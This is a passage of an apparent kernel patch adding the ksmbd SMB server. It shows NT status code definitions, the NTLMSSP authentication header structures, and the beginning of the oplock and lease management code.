++#define NT_STATUS_INVALID_IMAGE_NOT_MZ (0xC0000000 | 0x012f)
++#define NT_STATUS_INVALID_IMAGE_PROTECT (0xC0000000 | 0x0130)
++#define NT_STATUS_INVALID_IMAGE_WIN_16 (0xC0000000 | 0x0131)
++#define NT_STATUS_LOGON_SERVER_CONFLICT (0xC0000000 | 0x0132)
++#define NT_STATUS_TIME_DIFFERENCE_AT_DC (0xC0000000 | 0x0133)
++#define NT_STATUS_SYNCHRONIZATION_REQUIRED (0xC0000000 | 0x0134)
++#define NT_STATUS_DLL_NOT_FOUND (0xC0000000 | 0x0135)
++#define NT_STATUS_OPEN_FAILED (0xC0000000 | 0x0136)
++#define NT_STATUS_IO_PRIVILEGE_FAILED (0xC0000000 | 0x0137)
++#define NT_STATUS_ORDINAL_NOT_FOUND (0xC0000000 | 0x0138)
++#define NT_STATUS_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0139)
++#define NT_STATUS_CONTROL_C_EXIT (0xC0000000 | 0x013a)
++#define NT_STATUS_LOCAL_DISCONNECT (0xC0000000 | 0x013b)
++#define NT_STATUS_REMOTE_DISCONNECT (0xC0000000 | 0x013c)
++#define NT_STATUS_REMOTE_RESOURCES (0xC0000000 | 0x013d)
++#define NT_STATUS_LINK_FAILED (0xC0000000 | 0x013e)
++#define NT_STATUS_LINK_TIMEOUT (0xC0000000 | 0x013f)
++#define NT_STATUS_INVALID_CONNECTION (0xC0000000 | 0x0140)
++#define NT_STATUS_INVALID_ADDRESS (0xC0000000 | 0x0141)
++#define NT_STATUS_DLL_INIT_FAILED (0xC0000000 | 0x0142)
++#define NT_STATUS_MISSING_SYSTEMFILE (0xC0000000 | 0x0143)
++#define NT_STATUS_UNHANDLED_EXCEPTION (0xC0000000 | 0x0144)
++#define NT_STATUS_APP_INIT_FAILURE (0xC0000000 | 0x0145)
++#define NT_STATUS_PAGEFILE_CREATE_FAILED (0xC0000000 | 0x0146)
++#define NT_STATUS_NO_PAGEFILE (0xC0000000 | 0x0147)
++#define NT_STATUS_INVALID_LEVEL (0xC0000000 | 0x0148)
++#define NT_STATUS_WRONG_PASSWORD_CORE (0xC0000000 | 0x0149)
++#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT (0xC0000000 | 0x014a)
++#define NT_STATUS_PIPE_BROKEN (0xC0000000 | 0x014b)
++#define NT_STATUS_REGISTRY_CORRUPT (0xC0000000 | 0x014c)
++#define NT_STATUS_REGISTRY_IO_FAILED (0xC0000000 | 0x014d)
++#define NT_STATUS_NO_EVENT_PAIR (0xC0000000 | 0x014e)
++#define NT_STATUS_UNRECOGNIZED_VOLUME (0xC0000000 | 0x014f)
++#define NT_STATUS_SERIAL_NO_DEVICE_INITED (0xC0000000 | 0x0150)
++#define NT_STATUS_NO_SUCH_ALIAS (0xC0000000 | 0x0151)
++#define NT_STATUS_MEMBER_NOT_IN_ALIAS (0xC0000000 | 0x0152)
++#define NT_STATUS_MEMBER_IN_ALIAS (0xC0000000 | 0x0153)
++#define NT_STATUS_ALIAS_EXISTS (0xC0000000 | 0x0154)
++#define NT_STATUS_LOGON_NOT_GRANTED (0xC0000000 | 0x0155)
++#define NT_STATUS_TOO_MANY_SECRETS (0xC0000000 | 0x0156)
++#define NT_STATUS_SECRET_TOO_LONG (0xC0000000 | 0x0157)
++#define NT_STATUS_INTERNAL_DB_ERROR (0xC0000000 | 0x0158)
++#define NT_STATUS_FULLSCREEN_MODE (0xC0000000 | 0x0159)
++#define NT_STATUS_TOO_MANY_CONTEXT_IDS (0xC0000000 | 0x015a)
++#define NT_STATUS_LOGON_TYPE_NOT_GRANTED (0xC0000000 | 0x015b)
++#define NT_STATUS_NOT_REGISTRY_FILE (0xC0000000 | 0x015c)
++#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x015d)
++#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR (0xC0000000 | 0x015e)
++#define NT_STATUS_FT_MISSING_MEMBER (0xC0000000 | 0x015f)
++#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY (0xC0000000 | 0x0160)
++#define NT_STATUS_ILLEGAL_CHARACTER (0xC0000000 | 0x0161)
++#define NT_STATUS_UNMAPPABLE_CHARACTER (0xC0000000 | 0x0162)
++#define NT_STATUS_UNDEFINED_CHARACTER (0xC0000000 | 0x0163)
++#define NT_STATUS_FLOPPY_VOLUME (0xC0000000 | 0x0164)
++#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND (0xC0000000 | 0x0165)
++#define NT_STATUS_FLOPPY_WRONG_CYLINDER (0xC0000000 | 0x0166)
++#define NT_STATUS_FLOPPY_UNKNOWN_ERROR (0xC0000000 | 0x0167)
++#define NT_STATUS_FLOPPY_BAD_REGISTERS (0xC0000000 | 0x0168)
++#define NT_STATUS_DISK_RECALIBRATE_FAILED (0xC0000000 | 0x0169)
++#define NT_STATUS_DISK_OPERATION_FAILED (0xC0000000 | 0x016a)
++#define NT_STATUS_DISK_RESET_FAILED (0xC0000000 | 0x016b)
++#define NT_STATUS_SHARED_IRQ_BUSY (0xC0000000 | 0x016c)
++#define NT_STATUS_FT_ORPHANING (0xC0000000 | 0x016d)
++#define NT_STATUS_PARTITION_FAILURE (0xC0000000 | 0x0172)
++#define NT_STATUS_INVALID_BLOCK_LENGTH (0xC0000000 | 0x0173)
++#define NT_STATUS_DEVICE_NOT_PARTITIONED (0xC0000000 | 0x0174)
++#define NT_STATUS_UNABLE_TO_LOCK_MEDIA (0xC0000000 | 0x0175)
++#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA (0xC0000000 | 0x0176)
++#define NT_STATUS_EOM_OVERFLOW (0xC0000000 | 0x0177)
++#define NT_STATUS_NO_MEDIA (0xC0000000 | 0x0178)
++#define NT_STATUS_NO_SUCH_MEMBER (0xC0000000 | 0x017a)
++#define NT_STATUS_INVALID_MEMBER (0xC0000000 | 0x017b)
++#define NT_STATUS_KEY_DELETED (0xC0000000 | 0x017c)
++#define NT_STATUS_NO_LOG_SPACE (0xC0000000 | 0x017d)
++#define NT_STATUS_TOO_MANY_SIDS (0xC0000000 | 0x017e)
++#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x017f)
++#define NT_STATUS_KEY_HAS_CHILDREN (0xC0000000 | 0x0180)
++#define NT_STATUS_CHILD_MUST_BE_VOLATILE (0xC0000000 | 0x0181)
++#define NT_STATUS_DEVICE_CONFIGURATION_ERROR (0xC0000000 | 0x0182)
++#define NT_STATUS_DRIVER_INTERNAL_ERROR (0xC0000000 | 0x0183)
++#define NT_STATUS_INVALID_DEVICE_STATE (0xC0000000 | 0x0184)
++#define NT_STATUS_IO_DEVICE_ERROR (0xC0000000 | 0x0185)
++#define NT_STATUS_DEVICE_PROTOCOL_ERROR (0xC0000000 | 0x0186)
++#define NT_STATUS_BACKUP_CONTROLLER (0xC0000000 | 0x0187)
++#define NT_STATUS_LOG_FILE_FULL (0xC0000000 | 0x0188)
++#define NT_STATUS_TOO_LATE (0xC0000000 | 0x0189)
++#define NT_STATUS_NO_TRUST_LSA_SECRET (0xC0000000 | 0x018a)
++#define NT_STATUS_NO_TRUST_SAM_ACCOUNT (0xC0000000 | 0x018b)
++#define NT_STATUS_TRUSTED_DOMAIN_FAILURE (0xC0000000 | 0x018c)
++#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE (0xC0000000 | 0x018d)
++#define NT_STATUS_EVENTLOG_FILE_CORRUPT (0xC0000000 | 0x018e)
++#define NT_STATUS_EVENTLOG_CANT_START (0xC0000000 | 0x018f)
++#define NT_STATUS_TRUST_FAILURE (0xC0000000 | 0x0190)
++#define NT_STATUS_MUTANT_LIMIT_EXCEEDED (0xC0000000 | 0x0191)
++#define NT_STATUS_NETLOGON_NOT_STARTED (0xC0000000 | 0x0192)
++#define NT_STATUS_ACCOUNT_EXPIRED (0xC0000000 | 0x0193)
++#define NT_STATUS_POSSIBLE_DEADLOCK (0xC0000000 | 0x0194)
++#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT (0xC0000000 | 0x0195)
++#define NT_STATUS_REMOTE_SESSION_LIMIT (0xC0000000 | 0x0196)
++#define NT_STATUS_EVENTLOG_FILE_CHANGED (0xC0000000 | 0x0197)
++#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT (0xC0000000 | 0x0198)
++#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT (0xC0000000 | 0x0199)
++#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT (0xC0000000 | 0x019a)
++#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT (0xC0000000 | 0x019b)
++#define NT_STATUS_FS_DRIVER_REQUIRED (0xC0000000 | 0x019c)
++#define NT_STATUS_NO_USER_SESSION_KEY (0xC0000000 | 0x0202)
++#define NT_STATUS_USER_SESSION_DELETED (0xC0000000 | 0x0203)
++#define NT_STATUS_RESOURCE_LANG_NOT_FOUND (0xC0000000 | 0x0204)
++#define NT_STATUS_INSUFF_SERVER_RESOURCES (0xC0000000 | 0x0205)
++#define NT_STATUS_INVALID_BUFFER_SIZE (0xC0000000 | 0x0206)
++#define NT_STATUS_INVALID_ADDRESS_COMPONENT (0xC0000000 | 0x0207)
++#define NT_STATUS_INVALID_ADDRESS_WILDCARD (0xC0000000 | 0x0208)
++#define NT_STATUS_TOO_MANY_ADDRESSES (0xC0000000 | 0x0209)
++#define NT_STATUS_ADDRESS_ALREADY_EXISTS (0xC0000000 | 0x020a)
++#define NT_STATUS_ADDRESS_CLOSED (0xC0000000 | 0x020b)
++#define NT_STATUS_CONNECTION_DISCONNECTED (0xC0000000 | 0x020c)
++#define NT_STATUS_CONNECTION_RESET (0xC0000000 | 0x020d)
++#define NT_STATUS_TOO_MANY_NODES (0xC0000000 | 0x020e)
++#define NT_STATUS_TRANSACTION_ABORTED (0xC0000000 | 0x020f)
++#define NT_STATUS_TRANSACTION_TIMED_OUT (0xC0000000 | 0x0210)
++#define NT_STATUS_TRANSACTION_NO_RELEASE (0xC0000000 | 0x0211)
++#define NT_STATUS_TRANSACTION_NO_MATCH (0xC0000000 | 0x0212)
++#define NT_STATUS_TRANSACTION_RESPONDED (0xC0000000 | 0x0213)
++#define NT_STATUS_TRANSACTION_INVALID_ID (0xC0000000 | 0x0214)
++#define NT_STATUS_TRANSACTION_INVALID_TYPE (0xC0000000 | 0x0215)
++#define NT_STATUS_NOT_SERVER_SESSION (0xC0000000 | 0x0216)
++#define NT_STATUS_NOT_CLIENT_SESSION (0xC0000000 | 0x0217)
++#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE (0xC0000000 | 0x0218)
++#define NT_STATUS_DEBUG_ATTACH_FAILED (0xC0000000 | 0x0219)
++#define NT_STATUS_SYSTEM_PROCESS_TERMINATED (0xC0000000 | 0x021a)
++#define NT_STATUS_DATA_NOT_ACCEPTED (0xC0000000 | 0x021b)
++#define NT_STATUS_NO_BROWSER_SERVERS_FOUND (0xC0000000 | 0x021c)
++#define NT_STATUS_VDM_HARD_ERROR (0xC0000000 | 0x021d)
++#define NT_STATUS_DRIVER_CANCEL_TIMEOUT (0xC0000000 | 0x021e)
++#define NT_STATUS_REPLY_MESSAGE_MISMATCH (0xC0000000 | 0x021f)
++#define NT_STATUS_MAPPED_ALIGNMENT (0xC0000000 | 0x0220)
++#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH (0xC0000000 | 0x0221)
++#define NT_STATUS_LOST_WRITEBEHIND_DATA (0xC0000000 | 0x0222)
++#define NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID (0xC0000000 | 0x0223)
++#define NT_STATUS_PASSWORD_MUST_CHANGE (0xC0000000 | 0x0224)
++#define NT_STATUS_NOT_FOUND (0xC0000000 | 0x0225)
++#define NT_STATUS_NOT_TINY_STREAM (0xC0000000 | 0x0226)
++#define NT_STATUS_RECOVERY_FAILURE (0xC0000000 | 0x0227)
++#define NT_STATUS_STACK_OVERFLOW_READ (0xC0000000 | 0x0228)
++#define NT_STATUS_FAIL_CHECK (0xC0000000 | 0x0229)
++#define NT_STATUS_DUPLICATE_OBJECTID (0xC0000000 | 0x022a)
++#define NT_STATUS_OBJECTID_EXISTS (0xC0000000 | 0x022b)
++#define NT_STATUS_CONVERT_TO_LARGE (0xC0000000 | 0x022c)
++#define NT_STATUS_RETRY (0xC0000000 | 0x022d)
++#define NT_STATUS_FOUND_OUT_OF_SCOPE (0xC0000000 | 0x022e)
++#define NT_STATUS_ALLOCATE_BUCKET (0xC0000000 | 0x022f)
++#define NT_STATUS_PROPSET_NOT_FOUND (0xC0000000 | 0x0230)
++#define NT_STATUS_MARSHALL_OVERFLOW (0xC0000000 | 0x0231)
++#define NT_STATUS_INVALID_VARIANT (0xC0000000 | 0x0232)
++#define NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND (0xC0000000 | 0x0233)
++#define NT_STATUS_ACCOUNT_LOCKED_OUT (0xC0000000 | 0x0234)
++#define NT_STATUS_HANDLE_NOT_CLOSABLE (0xC0000000 | 0x0235)
++#define NT_STATUS_CONNECTION_REFUSED (0xC0000000 | 0x0236)
++#define NT_STATUS_GRACEFUL_DISCONNECT (0xC0000000 | 0x0237)
++#define NT_STATUS_ADDRESS_ALREADY_ASSOCIATED (0xC0000000 | 0x0238)
++#define NT_STATUS_ADDRESS_NOT_ASSOCIATED (0xC0000000 | 0x0239)
++#define NT_STATUS_CONNECTION_INVALID (0xC0000000 | 0x023a)
++#define NT_STATUS_CONNECTION_ACTIVE (0xC0000000 | 0x023b)
++#define NT_STATUS_NETWORK_UNREACHABLE (0xC0000000 | 0x023c)
++#define NT_STATUS_HOST_UNREACHABLE (0xC0000000 | 0x023d)
++#define NT_STATUS_PROTOCOL_UNREACHABLE (0xC0000000 | 0x023e)
++#define NT_STATUS_PORT_UNREACHABLE (0xC0000000 | 0x023f)
++#define NT_STATUS_REQUEST_ABORTED (0xC0000000 | 0x0240)
++#define NT_STATUS_CONNECTION_ABORTED (0xC0000000 | 0x0241)
++#define NT_STATUS_BAD_COMPRESSION_BUFFER (0xC0000000 | 0x0242)
++#define NT_STATUS_USER_MAPPED_FILE (0xC0000000 | 0x0243)
++#define NT_STATUS_AUDIT_FAILED (0xC0000000 | 0x0244)
++#define NT_STATUS_TIMER_RESOLUTION_NOT_SET (0xC0000000 | 0x0245)
++#define NT_STATUS_CONNECTION_COUNT_LIMIT (0xC0000000 | 0x0246)
++#define NT_STATUS_LOGIN_TIME_RESTRICTION (0xC0000000 | 0x0247)
++#define NT_STATUS_LOGIN_WKSTA_RESTRICTION (0xC0000000 | 0x0248)
++#define NT_STATUS_IMAGE_MP_UP_MISMATCH (0xC0000000 | 0x0249)
++#define NT_STATUS_INSUFFICIENT_LOGON_INFO (0xC0000000 | 0x0250)
++#define NT_STATUS_BAD_DLL_ENTRYPOINT (0xC0000000 | 0x0251)
++#define NT_STATUS_BAD_SERVICE_ENTRYPOINT (0xC0000000 | 0x0252)
++#define NT_STATUS_LPC_REPLY_LOST (0xC0000000 | 0x0253)
++#define NT_STATUS_IP_ADDRESS_CONFLICT1 (0xC0000000 | 0x0254)
++#define NT_STATUS_IP_ADDRESS_CONFLICT2 (0xC0000000 | 0x0255)
++#define NT_STATUS_REGISTRY_QUOTA_LIMIT (0xC0000000 | 0x0256)
++#define NT_STATUS_PATH_NOT_COVERED (0xC0000000 | 0x0257)
++#define NT_STATUS_NO_CALLBACK_ACTIVE (0xC0000000 | 0x0258)
++#define NT_STATUS_LICENSE_QUOTA_EXCEEDED (0xC0000000 | 0x0259)
++#define NT_STATUS_PWD_TOO_SHORT (0xC0000000 | 0x025a)
++#define NT_STATUS_PWD_TOO_RECENT (0xC0000000 | 0x025b)
++#define NT_STATUS_PWD_HISTORY_CONFLICT (0xC0000000 | 0x025c)
++#define NT_STATUS_PLUGPLAY_NO_DEVICE (0xC0000000 | 0x025e)
++#define NT_STATUS_UNSUPPORTED_COMPRESSION (0xC0000000 | 0x025f)
++#define NT_STATUS_INVALID_HW_PROFILE (0xC0000000 | 0x0260)
++#define NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH (0xC0000000 | 0x0261)
++#define NT_STATUS_DRIVER_ORDINAL_NOT_FOUND (0xC0000000 | 0x0262)
++#define NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0263)
++#define NT_STATUS_RESOURCE_NOT_OWNED (0xC0000000 | 0x0264)
++#define NT_STATUS_TOO_MANY_LINKS (0xC0000000 | 0x0265)
++#define NT_STATUS_QUOTA_LIST_INCONSISTENT (0xC0000000 | 0x0266)
++#define NT_STATUS_FILE_IS_OFFLINE (0xC0000000 | 0x0267)
++#define NT_STATUS_NETWORK_SESSION_EXPIRED  (0xC0000000 | 0x035c)
++#define NT_STATUS_NO_SUCH_JOB (0xC0000000 | 0xEDE)     /* scheduler */
++#define NT_STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP (0xC0000000 | 0x5D0000)
++#define NT_STATUS_PENDING 0x00000103
++#endif				/* _NTERR_H */
+diff --git a/fs/smb/server/ntlmssp.h b/fs/smb/server/ntlmssp.h
+new file mode 100644
+index 0000000000000..f13153c18b4e9
+--- /dev/null
++++ b/fs/smb/server/ntlmssp.h
+@@ -0,0 +1,169 @@
++/* SPDX-License-Identifier: LGPL-2.1+ */
++/*
++ *   Copyright (c) International Business Machines  Corp., 2002,2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ */
++
++#ifndef __KSMBD_NTLMSSP_H
++#define __KSMBD_NTLMSSP_H
++
++#define NTLMSSP_SIGNATURE "NTLMSSP"
++
++/* Security blob target info data */
++#define TGT_Name        "KSMBD"
++
++/*
++ * Size of the crypto key returned on the negotiate SMB in bytes
++ */
++#define CIFS_CRYPTO_KEY_SIZE	(8)
++#define CIFS_KEY_SIZE	(40)
++
++/*
++ * Size of encrypted user password in bytes
++ */
++#define CIFS_ENCPWD_SIZE	(16)
++#define CIFS_CPHTXT_SIZE	(16)
++
++/* Message Types */
++#define NtLmNegotiate     cpu_to_le32(1)
++#define NtLmChallenge     cpu_to_le32(2)
++#define NtLmAuthenticate  cpu_to_le32(3)
++#define UnknownMessage    cpu_to_le32(8)
++
++/* Negotiate Flags */
++#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
++#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
++#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
++/* define reserved9                       0x08 */
++#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
++#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
++#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
++#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
++/* defined reserved 8                   0x0100 */
++#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
++#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
++#define NTLMSSP_ANONYMOUS               0x0800
++#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
++#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
++#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
++#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
++#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
++#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
++#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
++#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB:not related to NTLMv2 pwd*/
++/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
++#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
++#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
++#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
++#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
++/* #define reserved4                 0x1000000 */
++#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we do not set */
++/* #define reserved3                 0x4000000 */
++/* #define reserved2                 0x8000000 */
++/* #define reserved1                0x10000000 */
++#define NTLMSSP_NEGOTIATE_128       0x20000000
++#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
++#define NTLMSSP_NEGOTIATE_56        0x80000000
++
++/* Define AV Pair Field IDs */
++enum av_field_type {
++	NTLMSSP_AV_EOL = 0,
++	NTLMSSP_AV_NB_COMPUTER_NAME,
++	NTLMSSP_AV_NB_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_COMPUTER_NAME,
++	NTLMSSP_AV_DNS_DOMAIN_NAME,
++	NTLMSSP_AV_DNS_TREE_NAME,
++	NTLMSSP_AV_FLAGS,
++	NTLMSSP_AV_TIMESTAMP,
++	NTLMSSP_AV_RESTRICTION,
++	NTLMSSP_AV_TARGET_NAME,
++	NTLMSSP_AV_CHANNEL_BINDINGS
++};
++
++/*
++ * The structure layouts and field names below deliberately follow the
++ * OpenGroup standards document for NTLMSSP rather than usual kernel
++ * style, so the code is easier to compare against the specification.
++ */
++
++struct security_buffer {
++	__le16 Length;
++	__le16 MaximumLength;
++	__le32 BufferOffset;	/* offset to buffer */
++} __packed;
++
++struct target_info {
++	__le16 Type;
++	__le16 Length;
++	__u8 Content[];
++} __packed;
++
++struct negotiate_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;     /* NtLmNegotiate = 1 */
++	__le32 NegotiateFlags;
++	struct security_buffer DomainName;	/* RFC 1001 style and ASCII */
++	struct security_buffer WorkstationName;	/* RFC 1001 and ASCII */
++	/*
++	 * struct security_buffer for version info not present since we
++	 * do not set the version is present flag
++	 */
++	char DomainString[];
++	/* followed by WorkstationString */
++} __packed;
++
++struct challenge_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;   /* NtLmChallenge = 2 */
++	struct security_buffer TargetName;
++	__le32 NegotiateFlags;
++	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
++	__u8 Reserved[8];
++	struct security_buffer TargetInfoArray;
++	/*
++	 * struct security_buffer for version info not present since we
++	 * do not set the version is present flag
++	 */
++} __packed;
++
++struct authenticate_message {
++	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
++	__le32 MessageType;  /* NtLmAuthenticate = 3 */
++	struct security_buffer LmChallengeResponse;
++	struct security_buffer NtChallengeResponse;
++	struct security_buffer DomainName;
++	struct security_buffer UserName;
++	struct security_buffer WorkstationName;
++	struct security_buffer SessionKey;
++	__le32 NegotiateFlags;
++	/*
++	 * struct security_buffer for version info not present since we
++	 * do not set the version is present flag
++	 */
++	char UserString[];
++} __packed;
++
++struct ntlmv2_resp {
++	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
++	__le32 blob_signature;
++	__u32  reserved;
++	__le64  time;
++	__u64  client_chal; /* random */
++	__u32  reserved2;
++	/* array of name entries could follow ending in minimum 4 byte struct */
++} __packed;
++
++/* per smb session structure/fields */
++struct ntlmssp_auth {
++	/* whether session key is per smb session */
++	bool		sesskey_per_smbsess;
++	/* sent by client in type 1 ntlmssp exchange */
++	__u32		client_flags;
++	/* sent by server in type 2 ntlmssp exchange */
++	__u32		conn_flags;
++	/* sent to server */
++	unsigned char	ciphertext[CIFS_CPHTXT_SIZE];
++	/* used by ntlmssp */
++	char		cryptkey[CIFS_CRYPTO_KEY_SIZE];
++};
++#endif /* __KSMBD_NTLMSSP_H */
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+new file mode 100644
+index 0000000000000..4b210cdd75569
+--- /dev/null
++++ b/fs/smb/server/oplock.c
+@@ -0,0 +1,1722 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/moduleparam.h>
++
++#include "glob.h"
++#include "oplock.h"
++
++#include "smb_common.h"
++#include "smbstatus.h"
++#include "connection.h"
++#include "mgmt/user_session.h"
++#include "mgmt/share_config.h"
++#include "mgmt/tree_connect.h"
++
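++/* Global list of per-client lease tables; entries are keyed by ClientGUID. */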
++static LIST_HEAD(lease_table_list);
++static DEFINE_RWLOCK(lease_list_lock);
++
++/**
++ * alloc_opinfo() - allocate a new opinfo object for oplock info
++ * @work:	smb work
++ * @id:		fid of open file
++ * @Tid:	tree id of connection
++ *
++ * Return:      allocated opinfo object on success, otherwise NULL
++ */
++static struct oplock_info *alloc_opinfo(struct ksmbd_work *work,
++					u64 id, __u16 Tid)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct oplock_info *opinfo;
++
++	opinfo = kzalloc(sizeof(struct oplock_info), GFP_KERNEL);
++	if (!opinfo)
++		return NULL;
++
++	opinfo->sess = sess;
++	opinfo->conn = conn;
++	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	opinfo->pending_break = 0;
++	opinfo->fid = id;
++	opinfo->Tid = Tid;
++	INIT_LIST_HEAD(&opinfo->op_entry);
++	INIT_LIST_HEAD(&opinfo->interim_list);
++	init_waitqueue_head(&opinfo->oplock_q);
++	init_waitqueue_head(&opinfo->oplock_brk);
++	atomic_set(&opinfo->refcount, 1);
++	atomic_set(&opinfo->breaking_cnt, 0);
++
++	return opinfo;
++}
++
++static void lease_add_list(struct oplock_info *opinfo)
++{
++	struct lease_table *lb = opinfo->o_lease->l_lb;
++
++	spin_lock(&lb->lb_lock);
++	list_add_rcu(&opinfo->lease_entry, &lb->lease_list);
++	spin_unlock(&lb->lb_lock);
++}
++
++static void lease_del_list(struct oplock_info *opinfo)
++{
++	struct lease_table *lb = opinfo->o_lease->l_lb;
++
++	if (!lb)
++		return;
++
++	spin_lock(&lb->lb_lock);
++	if (list_empty(&opinfo->lease_entry)) {
++		spin_unlock(&lb->lb_lock);
++		return;
++	}
++
++	list_del_init(&opinfo->lease_entry);
++	opinfo->o_lease->l_lb = NULL;
++	spin_unlock(&lb->lb_lock);
++}
++
++static void lb_add(struct lease_table *lb)
++{
++	write_lock(&lease_list_lock);
++	list_add(&lb->l_entry, &lease_table_list);
++	write_unlock(&lease_list_lock);
++}
++
++static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
++{
++	struct lease *lease;
++
++	lease = kmalloc(sizeof(struct lease), GFP_KERNEL);
++	if (!lease)
++		return -ENOMEM;
++
++	memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
++	lease->state = lctx->req_state;
++	lease->new_state = 0;
++	lease->flags = lctx->flags;
++	lease->duration = lctx->duration;
++	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
++	lease->version = lctx->version;
++	lease->epoch = 0;
++	INIT_LIST_HEAD(&opinfo->lease_entry);
++	opinfo->o_lease = lease;
++
++	return 0;
++}
++
++static void free_lease(struct oplock_info *opinfo)
++{
++	struct lease *lease;
++
++	lease = opinfo->o_lease;
++	kfree(lease);
++}
++
++static void free_opinfo(struct oplock_info *opinfo)
++{
++	if (opinfo->is_lease)
++		free_lease(opinfo);
++	kfree(opinfo);
++}
++
++static inline void opinfo_free_rcu(struct rcu_head *rcu_head)
++{
++	struct oplock_info *opinfo;
++
++	opinfo = container_of(rcu_head, struct oplock_info, rcu_head);
++	free_opinfo(opinfo);
++}
++
++struct oplock_info *opinfo_get(struct ksmbd_file *fp)
++{
++	struct oplock_info *opinfo;
++
++	rcu_read_lock();
++	opinfo = rcu_dereference(fp->f_opinfo);
++	if (opinfo && !atomic_inc_not_zero(&opinfo->refcount))
++		opinfo = NULL;
++	rcu_read_unlock();
++
++	return opinfo;
++}
++
++static struct oplock_info *opinfo_get_list(struct ksmbd_inode *ci)
++{
++	struct oplock_info *opinfo;
++
++	if (list_empty(&ci->m_op_list))
++		return NULL;
++
++	rcu_read_lock();
++	opinfo = list_first_or_null_rcu(&ci->m_op_list, struct oplock_info,
++					op_entry);
++	if (opinfo) {
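++		/*
++		 * Pin both the opinfo and its connection; back out if the
++		 * connection is already being torn down.
++		 */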
++		if (!atomic_inc_not_zero(&opinfo->refcount))
++			opinfo = NULL;
++		else {
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				atomic_dec(&opinfo->refcount);
++				opinfo = NULL;
++			}
++		}
++	}
++
++	rcu_read_unlock();
++
++	return opinfo;
++}
++
++static void opinfo_conn_put(struct oplock_info *opinfo)
++{
++	struct ksmbd_conn *conn;
++
++	if (!opinfo)
++		return;
++
++	conn = opinfo->conn;
++	/*
++	 * Check the waitqueue to drop pending requests on disconnection.
++	 * waitqueue_active() is safe here because the wait condition is
++	 * updated with atomic operations.
++	 */
++	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
++		wake_up(&conn->r_count_q);
++	opinfo_put(opinfo);
++}
++
++void opinfo_put(struct oplock_info *opinfo)
++{
++	if (!atomic_dec_and_test(&opinfo->refcount))
++		return;
++
++	call_rcu(&opinfo->rcu_head, opinfo_free_rcu);
++}
++
++static void opinfo_add(struct oplock_info *opinfo)
++{
++	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
++
++	write_lock(&ci->m_lock);
